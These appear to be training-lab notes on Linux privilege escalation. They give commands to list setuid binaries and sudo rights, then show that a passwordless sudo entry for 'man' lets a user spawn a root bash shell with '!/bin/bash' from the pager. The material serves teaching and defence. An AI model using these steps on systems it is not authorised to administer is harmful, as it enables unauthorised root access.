Misconfigured SUDO Privileges

Find misconfigured sudo privileges

Local Enumeration

Misconfigured SUDO Privileges

• Find setuid programs

find / -user root -perm -4000 -exec ls -ldb {} \;
 
find / -perm -u=s -type f 2>/dev/null

• Identify what commands the student user can run

sudo -l

❗ /usr/bin/man binary can be run with SUDO privileges, without providing a root user password

• This can happen on Linux systems for specific binaries that other users have to run with SUDO privileges. It looks harmless, but it can allow users to spawn bash privileged sessions, since the specific binary can be utilized to execute specific commands. Those commands are executed with the binary root privileges.

Privilege Escalation

sudo man ls

• In the man scrolling page, using the ! a bash can be spawned

!/bin/bash

# "root" bash sessions is received